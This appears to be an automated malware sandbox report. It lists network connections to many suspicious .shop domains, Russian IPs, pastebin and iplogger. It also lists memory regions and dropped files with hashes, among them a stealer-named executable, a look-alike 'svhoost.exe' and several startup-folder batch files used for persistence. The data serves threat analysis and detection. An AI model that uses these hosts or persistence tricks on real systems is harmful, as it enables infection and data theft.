US 8.8.8.8:53 detailbaconroollyws.shop udp
US 104.21.76.102:443 detailbaconroollyws.shop tcp
US 8.8.8.8:53 87.55.21.104.in-addr.arpa udp
US 8.8.8.8:53 museumtespaceorsp.shop udp
DE 23.88.106.134:80 23.88.106.134 tcp
US 104.21.32.80:443 museumtespaceorsp.shop tcp
US 8.8.8.8:53 horsedwollfedrwos.shop udp
US 172.67.157.243:443 horsedwollfedrwos.shop tcp
US 8.8.8.8:53 buttockdecarderwiso.shop udp
US 104.21.45.202:443 buttockdecarderwiso.shop tcp
US 8.8.8.8:53 102.76.21.104.in-addr.arpa udp
US 8.8.8.8:53 134.106.88.23.in-addr.arpa udp
US 8.8.8.8:53 80.32.21.104.in-addr.arpa udp
US 8.8.8.8:53 243.157.67.172.in-addr.arpa udp
US 8.8.8.8:53 patternapplauderw.shop udp
US 104.21.55.248:443 patternapplauderw.shop tcp
US 8.8.8.8:53 averageaattractiionsl.shop udp
US 104.21.62.60:443 averageaattractiionsl.shop tcp
US 8.8.8.8:53 understanndtytonyguw.shop udp
US 104.21.22.94:443 understanndtytonyguw.shop tcp
US 8.8.8.8:53 femininiespywageg.shop udp
US 104.21.71.3:443 femininiespywageg.shop tcp
US 8.8.8.8:53 considerrycurrentyws.shop udp
US 8.8.8.8:53 202.45.21.104.in-addr.arpa udp
US 8.8.8.8:53 248.55.21.104.in-addr.arpa udp
US 8.8.8.8:53 60.62.21.104.in-addr.arpa udp
US 104.21.28.32:443 considerrycurrentyws.shop tcp
US 8.8.8.8:53 employhabragaomlsp.shop udp
US 172.67.203.218:443 employhabragaomlsp.shop tcp
US 8.8.8.8:53 messtimetabledkolvk.shop udp
US 104.21.8.238:443 messtimetabledkolvk.shop tcp
US 8.8.8.8:53 stalfbaclcalorieeis.shop udp
US 104.21.3.197:443 stalfbaclcalorieeis.shop tcp
US 8.8.8.8:53 civilianurinedtsraov.shop udp
US 8.8.8.8:53 94.22.21.104.in-addr.arpa udp
US 8.8.8.8:53 3.71.21.104.in-addr.arpa udp
US 8.8.8.8:53 32.28.21.104.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 218.203.67.172.in-addr.arpa udp
US 172.67.197.146:443 civilianurinedtsraov.shop tcp
US 8.8.8.8:53 deprivedrinkyfaiir.shop udp
US 172.67.134.244:443 deprivedrinkyfaiir.shop tcp
US 8.8.8.8:53 relaxtionflouwerwi.shop udp
US 104.21.76.64:443 relaxtionflouwerwi.shop tcp
RU 5.42.65.67:48396 tcp
US 8.8.8.8:53 238.8.21.104.in-addr.arpa udp
US 8.8.8.8:53 197.3.21.104.in-addr.arpa udp
US 8.8.8.8:53 146.197.67.172.in-addr.arpa udp
US 8.8.8.8:53 244.134.67.172.in-addr.arpa udp
US 8.8.8.8:53 64.76.21.104.in-addr.arpa udp
US 8.8.8.8:53 67.65.42.5.in-addr.arpa udp
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 104.21.79.77:443 yip.su tcp
US 8.8.8.8:53 gigapub.ma udp
DE 185.172.128.82:80 185.172.128.82 tcp
US 8.8.8.8:53 f000.backblazeb2.com udp
US 104.153.233.177:443 f000.backblazeb2.com tcp
RU 5.42.66.47:80 5.42.66.47 tcp
FR 51.75.247.100:443 gigapub.ma tcp
US 8.8.8.8:53 free.360totalsecurity.com udp
RU 5.42.66.47:80 5.42.66.47 tcp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
US 8.8.8.8:53 77.79.21.104.in-addr.arpa udp
US 8.8.8.8:53 82.128.172.185.in-addr.arpa udp
NL 151.236.127.172:443 free.360totalsecurity.com tcp
US 8.8.8.8:53 100.247.75.51.in-addr.arpa udp
US 8.8.8.8:53 47.66.42.5.in-addr.arpa udp
US 8.8.8.8:53 177.233.153.104.in-addr.arpa udp
US 8.8.8.8:53 172.127.236.151.in-addr.arpa udp
US 8.8.8.8:53 st.p.360safe.com udp
US 8.8.8.8:53 tr.p.360safe.com udp
US 8.8.8.8:53 s.360safe.com udp
US 8.8.8.8:53 iup.360safe.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 iili.io udp
IE 54.77.42.29:3478 st.p.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
US 104.21.235.69:443 iili.io tcp
US 8.8.8.8:53 29.42.77.54.in-addr.arpa udp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
IE 54.76.174.118:80 tr.p.360safe.com udp
DE 52.29.179.141:80 s.360safe.com tcp
DE 52.29.179.141:80 s.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
US 8.8.8.8:53 int.down.360safe.com udp
US 8.8.8.8:53 69.235.21.104.in-addr.arpa udp
US 8.8.8.8:53 118.174.76.54.in-addr.arpa udp
GB 18.245.187.50:80 int.down.360safe.com tcp
GB 18.245.187.120:80 int.down.360safe.com tcp
GB 18.245.187.104:80 int.down.360safe.com tcp
GB 18.245.187.27:80 int.down.360safe.com tcp
GB 18.245.187.50:80 int.down.360safe.com tcp
US 8.8.8.8:53 sd.p.360safe.com udp
GB 18.245.187.27:80 int.down.360safe.com tcp
GB 99.86.249.120:80 sd.p.360safe.com tcp
US 8.8.8.8:53 50.187.245.18.in-addr.arpa udp
US 8.8.8.8:53 120.187.245.18.in-addr.arpa udp
US 8.8.8.8:53 27.187.245.18.in-addr.arpa udp
US 8.8.8.8:53 104.187.245.18.in-addr.arpa udp
US 8.8.8.8:53 120.249.86.99.in-addr.arpa udp
DE 52.29.179.141:80 s.360safe.com tcp
US 8.8.8.8:53 141.179.29.52.in-addr.arpa udp
US 8.8.8.8:53 iplogger.com udp
GB 18.245.187.104:80 int.down.360safe.com tcp
US 172.67.188.178:443 iplogger.com tcp
GB 18.245.187.120:80 int.down.360safe.com tcp
US 8.8.8.8:53 178.188.67.172.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
GB 18.245.187.50:80 int.down.360safe.com tcp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
GB 18.245.187.50:80 int.down.360safe.com tcp
GB 18.245.187.27:80 int.down.360safe.com tcp
GB 18.245.187.104:80 int.down.360safe.com tcp
GB 18.245.187.27:80 int.down.360safe.com tcp
GB 18.245.187.104:80 int.down.360safe.com tcp
GB 18.245.187.120:80 int.down.360safe.com tcp
GB 18.245.187.27:80 int.down.360safe.com tcp
GB 18.245.187.104:80 int.down.360safe.com tcp
GB 18.245.187.50:80 int.down.360safe.com tcp
GB 18.245.187.120:80 int.down.360safe.com tcp
GB 18.245.187.104:80 int.down.360safe.com tcp
GB 18.245.187.50:80 int.down.360safe.com tcp
GB 18.245.187.50:80 int.down.360safe.com tcp
GB 18.245.187.104:80 int.down.360safe.com tcp
GB 18.245.187.50:80 int.down.360safe.com tcp
GB 18.245.187.120:80 int.down.360safe.com tcp
GB 18.245.187.104:80 int.down.360safe.com tcp
GB 18.245.187.50:80 int.down.360safe.com tcp
GB 18.245.187.50:80 int.down.360safe.com tcp
DE 52.29.179.141:80 s.360safe.com tcp
DE 52.29.179.141:80 s.360safe.com tcp
US 8.8.8.8:53 orion.ts.360.com udp
NL 82.145.215.152:443 orion.ts.360.com tcp
US 8.8.8.8:53 152.215.145.82.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 104.21.235.69:443 iili.io tcp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 tconf.cloud.360safe.com udp
IE 54.76.137.217:80 tconf.cloud.360safe.com tcp
IE 54.76.137.217:53 tconf.cloud.360safe.com udp
US 8.8.8.8:53 217.137.76.54.in-addr.arpa udp
US 8.8.8.8:53 u.qurl.cloud.360safe.com udp
IE 54.76.137.217:53 tconf.cloud.360safe.com udp
IE 54.76.137.217:80 tconf.cloud.360safe.com tcp
IE 54.76.137.217:80 tconf.cloud.360safe.com tcp
IE 54.76.29.49:80 tcp
IE 54.76.137.217:53 tconf.cloud.360safe.com udp
IE 54.76.137.217:53 tconf.cloud.360safe.com udp
US 8.8.8.8:53 49.29.76.54.in-addr.arpa udp
IE 54.77.143.119:80 tcp
US 8.8.8.8:53 119.143.77.54.in-addr.arpa udp
US 8.8.8.8:53 s.360safe.com udp
DE 52.29.179.141:80 s.360safe.com tcp
US 8.8.8.8:53 s.360totalsecurity.com udp
NL 82.145.213.43:80 s.360totalsecurity.com tcp
US 8.8.8.8:53 43.213.145.82.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
DE 52.29.179.141:80 s.360safe.com tcp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 spec.cloud.360safe.com udp
US 104.192.108.152:80 spec.cloud.360safe.com tcp
US 8.8.8.8:53 conf.f.360.cn udp
US 8.8.8.8:53 152.108.192.104.in-addr.arpa udp
CN 1.192.137.24:80 conf.f.360.cn tcp
CN 180.163.243.118:80 conf.f.360.cn tcp
IE 54.76.137.217:53 tconf.cloud.360safe.com udp
IE 54.76.137.217:53 tconf.cloud.360safe.com udp
RU 45.142.122.192:47398 tcp
IE 54.76.137.217:53 tconf.cloud.360safe.com udp
US 8.8.8.8:53 192.122.142.45.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 service-domain.xyz udp
US 54.210.117.250:443 service-domain.xyz tcp
US 8.8.8.8:53 250.117.210.54.in-addr.arpa udp
US 8.8.8.8:53 162.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.187.238:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 172.217.16.225:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 106.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 35.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
GB 142.250.187.238:443 clients2.google.com tcp
IE 54.76.137.217:53 tconf.cloud.360safe.com udp
US 8.8.8.8:53 api2.check-data.xyz udp
US 44.237.26.169:80 api2.check-data.xyz tcp
US 8.8.8.8:53 169.26.237.44.in-addr.arpa udp
US 8.8.8.8:53 tconf.cloud.360safe.com udp
IE 54.76.137.217:53 tconf.cloud.360safe.com udp
IE 54.76.137.217:53 tconf.cloud.360safe.com udp
IE 54.76.137.169:80 54.76.137.169 tcp
US 8.8.8.8:53 169.137.76.54.in-addr.arpa udp

Files

memory/1952-0-0x0000000000FA0000-0x0000000001449000-memory.dmp

memory/1952-1-0x0000000077CF4000-0x0000000077CF6000-memory.dmp

memory/1952-2-0x0000000000FA1000-0x0000000000FCF000-memory.dmp

memory/1952-3-0x0000000000FA0000-0x0000000001449000-memory.dmp

memory/1952-5-0x0000000000FA0000-0x0000000001449000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

MD5 a49d4ea8ceef49682b23f1308f5fce4b
SHA1 eed6afea70bb6655a8d1289ad072a186ee3ed1de
SHA256 cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc
SHA512 1efda3277e81e247645e48cd7cd0537d345cbff187bda289655e60d040d25d529f9f33988d2108321de6b0a387c254b989457a4bf30a1408a3ec162ac6ebdc70

memory/1392-15-0x0000000000910000-0x0000000000DB9000-memory.dmp

memory/1952-18-0x0000000000FA0000-0x0000000001449000-memory.dmp

memory/1392-19-0x0000000000911000-0x000000000093F000-memory.dmp

memory/1392-20-0x0000000000910000-0x0000000000DB9000-memory.dmp

memory/1392-21-0x0000000000910000-0x0000000000DB9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe

MD5 208bd37e8ead92ed1b933239fb3c7079
SHA1 941191eed14fce000cfedbae9acfcb8761eb3492
SHA256 e1fd277ffc74d67554adce94366e6fa5ebc81f8c4999634bcc3396164ba38494
SHA512 a9c3c32573a16b7ca71a12af6e8c8e88502b66bae2465a82dd921fbc6e0c833b9b1c2d436963df189dd9d68568e1be9128826a2e59f1d5fe066b637d2d866715

memory/5000-37-0x00000000003E0000-0x00000000003E1000-memory.dmp

memory/5000-39-0x00000000003E0000-0x00000000003E1000-memory.dmp

memory/4208-38-0x0000000000400000-0x0000000000592000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe

MD5 84bf36993bdd61d216e83fe391fcc7fd
SHA1 e023212e847a54328aaea05fbe41eb4828855ce6
SHA256 8e6d8b5a004c8f21bee1bbe4213c6d78cf80e439b38f587e963e9bb4569aaffa
SHA512 bb3241949618ad2d39057e085e150f43b4d41d74efc4658d9c27f8c0ec80420191517a2c0b6b7e225c4e50e02cd031cdfd178e05b9a869847a3c27b210d09caf

memory/4328-60-0x0000000000BB0000-0x0000000000C02000-memory.dmp

memory/4328-61-0x0000000005990000-0x0000000005F34000-memory.dmp

memory/4328-62-0x00000000054C0000-0x0000000005552000-memory.dmp

memory/4328-63-0x0000000005580000-0x000000000558A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Tmp6A14.tmp

MD5 1420d30f964eac2c85b2ccfe968eebce
SHA1 bdf9a6876578a3e38079c4f8cf5d6c79687ad750
SHA256 f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9
SHA512 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe

MD5 15a7cae61788e4718d3c33abb7be6436
SHA1 62dac3a5d50c93c51f2ab4a5ebf78837dc7d3a9f
SHA256 bed71147aa297d95d2e2c67352fc06f7f631af3b7871ea148638ae66fc41e200
SHA512 5b3e3028523e95452be169bdfb966cd03ea5dbe34b7b98cf7482ca91b8317a0f4de224751d5a530ec23e72cbd6cc8e414d2d3726fefee9c30feab69dc348fa45

C:\Users\Admin\AppData\Roaming\configurationValue\One.exe

MD5 816df4ac8c796b73a28159a0b17369b6
SHA1 db8bbb6f73fab9875de4aaa489c03665d2611558
SHA256 7843255bc50ddda8c651f51347313daf07e53a745d39cc61d708c6e7d79b3647
SHA512 7dd155346acf611ffaf6399408f6409146fd724d7d382c7e143e3921e3d109563c314a0367a378b0965e427470f36bf6d70e1586d695a266f34aebd789965285

C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe

MD5 c4ffab152141150528716daa608d5b92
SHA1 a48d3aecc0e986b6c4369b9d4cfffb08b53aed89
SHA256 c28de1802bdbcf51c88cd1a4ac5c1decb0558fa213d83833cf5dbd990b9ae475
SHA512 a225e98f2bc27e2add9d34bd850e0e66a27bd1db757c979639a636a6efe412e638025c6e235c36188a24c9af2bde4b17d1dbaa0707dce11411402cd5de8024e9

memory/3728-108-0x0000000000320000-0x0000000000372000-memory.dmp

memory/4328-97-0x0000000006140000-0x00000000061B6000-memory.dmp

memory/4328-114-0x0000000006A10000-0x0000000006A2E000-memory.dmp

memory/4328-137-0x0000000006C20000-0x0000000006C32000-memory.dmp

memory/4328-138-0x0000000006C80000-0x0000000006CBC000-memory.dmp

memory/4328-136-0x0000000006CE0000-0x0000000006DEA000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-4124900551-4068476067-3491212533-1000\76b53b3ec448f7ccdda2063b15d2bfc3_310807ab-751f-4d81-ae09-b202eaf21e19

MD5 7d8e2485108589f16378230324aeb2c5
SHA1 567c35370a709502d544c0cc4e1553cd67c7d5f1
SHA256 5df3d6489aedb5d2f3f60c897e05ede745e91ea72c65704d2d2d54d630752138
SHA512 e35d996e9863c2bddbde1de0a04c053a17ad930e04ed0d039412f2789774264c834ccd46484bf413f236e961d30d1acf762b56e6c8f49e24da180bb7163a2597

memory/4328-132-0x0000000007190000-0x00000000077A8000-memory.dmp

memory/4328-140-0x0000000006DF0000-0x0000000006E3C000-memory.dmp

C:\Users\Admin\Desktop\Microsoft Edge.lnk

MD5 425d1698cf2c3d8df8b419ca63ad4773
SHA1 337d26694ab542d4a075d71b4b14bb23d3cd42d9
SHA256 396a476efe715fc3621669f347d7ec6f2a7b2b820dd74bad3bd8a6e973a0911d
SHA512 0542a627290dfba6da25482570d87ab4d2b45f5be9a724f7e1e3ddfd87745e6c2543d4a2e48a9de63e7738d84296ab5dc2cb52108a688243ff9306eb2da36339

C:\Users\Public\Desktop\Google Chrome.lnk

MD5 2154471ee95b28cec3d0050632a6ea19
SHA1 5a4e8ddcbb9d9863e9c9f450fca90448f1dcc305
SHA256 8a56104819a595229abaa45637c86ddfa4e6292c2db9231a648b0b5dcb02db64
SHA512 8d22d30f9d87fbb6a5111e50f9a152280f92dcd65190b493028ec63700edd5d83c88f4d8797f6574fa1151768bd9af1688afcbb9df86577beddeef25e3a6d31f

memory/4292-145-0x0000000000DB0000-0x0000000000E1C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe

MD5 0b7e08a8268a6d413a322ff62d389bf9
SHA1 e04b849cc01779fe256744ad31562aca833a82c1
SHA256 d23a10b3ff0c565ea8ee7f54bcded0582e1e621ebad69d4523d6746f6d8e0e65
SHA512 3d226673e30bbbc27e0a5a6c64bf81eca475c697486b20141df7975bef97901d4865b88f41937f5e3dd00b437f24f91493f80cb69aa366b7a49cd17b26197ba4

memory/1828-165-0x0000000000400000-0x0000000000455000-memory.dmp

memory/3160-164-0x0000000000D20000-0x0000000000D21000-memory.dmp

memory/1828-163-0x0000000000400000-0x0000000000455000-memory.dmp

memory/3360-169-0x0000000000400000-0x0000000000459000-memory.dmp

memory/3260-168-0x0000000000DF0000-0x0000000000DF1000-memory.dmp

memory/3360-167-0x0000000000400000-0x0000000000459000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe

MD5 05b11e7b711b4aaa512029ffcb529b5a
SHA1 a8074cf8a13f21617632951e008cdfdace73bb83
SHA256 2aab2ca39749b21877d1c52526009f9f5d251d934205e9f671a9e84cecd55afa
SHA512 dde7b561ffb3b9fe71827be9313cd3b83900c3ce76b053d028e84223fba1b06035437b3860a74de7dc2f5d40f0b90bd7d60139701d752c803eb08f362a5d57ff

memory/4024-187-0x0000000002320000-0x0000000002321000-memory.dmp

memory/2248-186-0x0000000000400000-0x000000000063B000-memory.dmp

memory/2248-188-0x0000000000400000-0x000000000063B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe

MD5 a991da123f34074f2ee8ea0d798990f9
SHA1 3988195503348626e8f9185747a216c8e7839130
SHA256 fd42e618223f510d694c5fb2f8ecbc1a88cabf003bcf20da6227da30a1352a0f
SHA512 1f958cacb820833ea8b5ac2d9ca7f596625e688f8f6b6e3ab6f27aa3b25b8c9e5b57e1eed532a8d2519da6c1b41492eb8ac930fc25eaf2be2f344c2f32e81a49

memory/3184-207-0x000001F122A90000-0x000001F122ACC000-memory.dmp

memory/3728-208-0x00000000066A0000-0x0000000006706000-memory.dmp

memory/4292-215-0x000000001BEC0000-0x000000001BEFC000-memory.dmp

memory/4292-214-0x000000001BE60000-0x000000001BE72000-memory.dmp

memory/4292-213-0x000000001E920000-0x000000001EA2A000-memory.dmp

memory/1392-216-0x0000000000910000-0x0000000000DB9000-memory.dmp

memory/3184-218-0x000001F1247F0000-0x000001F12484C000-memory.dmp

memory/3184-217-0x000001F122ED0000-0x000001F122ED6000-memory.dmp

memory/4292-219-0x000000001ED30000-0x000000001EDA6000-memory.dmp

memory/4292-220-0x000000001BEA0000-0x000000001BEBE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_stewaln1.drg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5112-222-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2648-232-0x000001A4B8650000-0x000001A4B8672000-memory.dmp

memory/3728-233-0x0000000007420000-0x0000000007470000-memory.dmp

C:\Users\Admin\Pictures\l6Bw5qI801CLBPG4VraE7oce.exe

MD5 77f762f953163d7639dff697104e1470
SHA1 ade9fff9ffc2d587d50c636c28e4cd8dd99548d3
SHA256 d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea
SHA512 d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499

memory/4292-245-0x000000001F580000-0x000000001F742000-memory.dmp

memory/4292-246-0x000000001FC80000-0x00000000201A8000-memory.dmp

C:\Users\Admin\Pictures\jfwLrbtuGmt3WgBnEjEXTdp4.exe

MD5 cd4acedefa9ab5c7dccac667f91cef13
SHA1 bff5ce910f75aeae37583a63828a00ae5f02c4e7
SHA256 dd0e8944471f44180dd44807d817e0b8a1c931fc67d48278cdb7354d98567e7c
SHA512 06fae66da503eb1b9b4fbe63a5bb98c519a43999060029c35fe289e60b1cb126a6278c67ce90f02e05b893fcaea6d54f9deb65bc6da82561487a7754f50c93d1

C:\Users\Admin\Pictures\UBjA5DPMgvprl58O4Rm6wkOw.exe

MD5 ef65292d26c79999f9cd88fc202e257e
SHA1 bb1022e9d3d345f14db1f7e431d4d63259fa3ac2
SHA256 4bd44fc79eff569312def70fb850c7f168e84d039f4d1d23b7a4927338476222
SHA512 7df62adbecb10d5894741e85ee99df64949eb8a8300e352a5e9d8253b65ea58971f10d10a1f7a8dc0b99bfc87ab8ee511499a6b740cc996f8ec64e312209d02a

memory/4252-273-0x0000000000360000-0x00000000003CA000-memory.dmp

memory/4252-274-0x00000000055D0000-0x000000000566C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{ABBC6F7A-4BD0-44e4-B37C-8D2FC454366C}.tmp\360P2SP.dll

MD5 fc1796add9491ee757e74e65cedd6ae7
SHA1 603e87ab8cb45f62ecc7a9ef52d5dedd261ea812
SHA256 bf1b96f5b56be51e24d6314bc7ec25f1bdba2435f4dfc5be87de164fe5de9e60
SHA512 8fa2e4ff5cbc05034051261c778fec1f998ceb2d5e8dea16b26b91056a989fdc58f33767687b393f32a5aff7c2b8d6df300b386f608abd0ad193068aa9251e0d

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 184a117024f3789681894c67b36ce990
SHA1 c5b687db3b27ef04ad2b2cbc9f4e523cb7f6ba7e
SHA256 b10d5fef165fc89e61cd16e02eac1b90b8f94ef95218bdd4b678cd0d5c8a925e
SHA512 354d3bbc1329cbbe30d22f0cf95564e44acc68d6fe91e2beb4584a473d320faf4c092de9db7f1f93cf0b235703fc8de913883985c7d5db6b596244771a1edaf7

C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.ini

MD5 e6edb41c03bce3f822020878bde4e246
SHA1 03198ad7bbfbdd50dd66ab4bed13ad230b66e4d9
SHA256 9fa80f0889358d9db3d249a2e747e27b7c01c6123b784d94d169c0e54cacf454
SHA512 2d71b7d50212f980e82562af95598c430aa0875f7a9d9cc670ba2cb1f63057fb26fd747a99cb4ca08f2355d002daa79bda2236b3ad9e37a3cfef32ae5420e2a1

C:\Users\Admin\Pictures\H0UVbMblodCc40gmvFoORgyt.exe

MD5 acadbe83c09a7a9b8213a662eda12e93
SHA1 26a6e55076bc0602ff9060ac529528f3fc631986
SHA256 42dd6aeee394e298646701ebe1fd611186ea4ee8c7e6383913db121444635944
SHA512 a7ad3777e4a5ae9dd8dd09cff3a3ab498c6d2dc5b922407c48936225cb0c91430f75114f46b0a7b39046dc45c26221e199d33ff0bce105e05e903eef7fbdcd9f

memory/4252-323-0x0000000008220000-0x00000000084E2000-memory.dmp

memory/5024-324-0x000001E433680000-0x000001E4342D2000-memory.dmp

memory/4252-325-0x0000000001330000-0x0000000001336000-memory.dmp

memory/1392-330-0x0000000000910000-0x0000000000DB9000-memory.dmp

memory/4252-331-0x0000000008810000-0x000000000882A000-memory.dmp

memory/4252-332-0x0000000008830000-0x0000000008836000-memory.dmp

memory/1392-333-0x0000000000910000-0x0000000000DB9000-memory.dmp

memory/1392-334-0x0000000000910000-0x0000000000DB9000-memory.dmp

memory/1392-335-0x0000000000910000-0x0000000000DB9000-memory.dmp

memory/1392-336-0x0000000000910000-0x0000000000DB9000-memory.dmp

memory/1392-337-0x0000000000910000-0x0000000000DB9000-memory.dmp

memory/1392-347-0x0000000000910000-0x0000000000DB9000-memory.dmp

memory/4988-352-0x0000000000910000-0x0000000000DB9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1717037821_00000000_base\360base.dll

MD5 b192f34d99421dc3207f2328ffe62bd0
SHA1 e4bbbba20d05515678922371ea787b39f064cd2c
SHA256 58f13d919f44d194827b609b6b267246abc47134bb202472c0dfe033b9d7ed73
SHA512 00d4c7a0a0097eb4b31a71a0eaf6ff0d44619f77a335c75688565e34e6d7f4fb6c258917457d560c6b0a5077603845ce012e01d9862e87fb5327d7f8da970f95

memory/4988-374-0x0000000000910000-0x0000000000DB9000-memory.dmp

memory/1392-379-0x0000000000910000-0x0000000000DB9000-memory.dmp

memory/3764-381-0x0000000000400000-0x000000000045C000-memory.dmp

memory/3764-380-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1392-382-0x0000000000910000-0x0000000000DB9000-memory.dmp

memory/3764-398-0x0000000000400000-0x000000000045C000-memory.dmp

memory/3764-408-0x0000000000400000-0x000000000045C000-memory.dmp

memory/3764-406-0x0000000000400000-0x000000000045C000-memory.dmp

memory/3764-404-0x0000000000400000-0x000000000045C000-memory.dmp

memory/3764-390-0x0000000000400000-0x000000000045C000-memory.dmp

memory/3764-388-0x0000000000400000-0x000000000045C000-memory.dmp

memory/3764-386-0x0000000000400000-0x000000000045C000-memory.dmp

memory/3764-384-0x0000000000400000-0x000000000045C000-memory.dmp

C:\Windows\System32\drivers\360FsFlt.sys

MD5 b372e31c719a47b08fe4d377d5df4bde
SHA1 ea936fa64b8d11fa41825f07c2ceeb886804956c
SHA256 8d21a430b38d74157f5d73f8dfd4d508c2fff7f2945fa2987794f656b3acb58c
SHA512 fc2962127bb84aff61239fefc060c002edb6560e11a5e7d2d0dd6d15a431200eb5ac988867988ddd84fd5da241f6bc4a1319ffa83cc9ce7d5691e7e5c4170625

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\90k57km6dgCoPYO3YD7Tth99.bat

MD5 b00ca844589e70d49175eb3340268c43
SHA1 a64dd1e88eff4e7554bd713930d3376eab6083b3
SHA256 adcfe43acb556abcc3538aec825f0fa64fc5cbbd8e86429591224cc430d5974c
SHA512 e7f6496927d03094952dbaaf04a16e3efb8c0eac325093c5ec9beba44c4c4b1f93d7f9cef1b55561b0670b057d78b807acc7e76d3462f6d8b72e984b63db0b53

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\W3RHf5IDlauw2xLLEFu6nXpk.bat

MD5 127f8c2ff599105d7c79d6dc9ef0d264
SHA1 4ab19e2ce80053b0ec86c5173fd41e04d1cb3b3d
SHA256 c13da582f5037c4c1ee7a7f36eba0876999a4606a0975ac732063572beb09d01
SHA512 ac9675c866b4f15f41d47fd86910c0e194f24e8721a320c934533b614f817fada07f4030f568d59442de165072a6cd264ad43c75a51ebfe320f1701c21eb19a6

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uz12620uwxZn724uCMM9FgMO.bat

MD5 397b65ac63811e9956ea073e354cb789
SHA1 e37252697325afaf53d847cd8f558ed0d5155f0f
SHA256 9a9afcbd7c5d115df3db1ad7693aee08173dd1d4e44c07227c91d4503bc42590
SHA512 285d1e5e9c67ff892a103a28db3e0559f195ccc62856e6e0487631f5aba3500f931a2f164475cd95d6ae61079389eb64c57d7ba31a3825d9297718294dfee96d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CUPKdmqFz1ooxBrPhSDvJjzn.bat

MD5 50a28132f432bc8aed84c175cbbd8a19
SHA1 eac93034192bc9fd179228af228dc4edba47dc44
SHA256 049b3dd595f1b087414e75bffb86d48eb435e120001a075842e5d7fe8e69d0dc
SHA512 2411977b6e2bd65fa3150ae023be31a73e92a02c51a890b30971d9cb08c0fa80177ead4387cad33bb8e3c251b27ed708e60b7922c528794299cb8423a0d71a9d

C:\Program Files (x86)\360\Total Security\deepscan\speedmem2.hg

MD5 4c6845ee34c9625fa970ce1e8b97c819
SHA1 fd73546e3771a86872aa0500114a0d90fbf541ab
SHA256 cdf42b98169bdaca17baa93b2a0ecd85b30b1b4e617a1161d7a8fdd16bbede7e
SHA512 e53632115613f28509bb02980f5cc2bde89b4401b6cb0041a037c49f1979b51a12f1263b4ff8ac897305b0aef3bfcbfbf344f53c2a34ed3921726a4535557e33

C:\Program Files (x86)\360\Total Security\deepscan\netconf.dat

MD5 6cf08213a293f328905c6e57676fe5ac
SHA1 a4c7b339f54b5b2aa76d0ef51a1e107a1552bfc9
SHA256 6ed1d27a14753f014ee2795816aeb2b39ea8dcbbfef0fcffbfea23840aaa7782
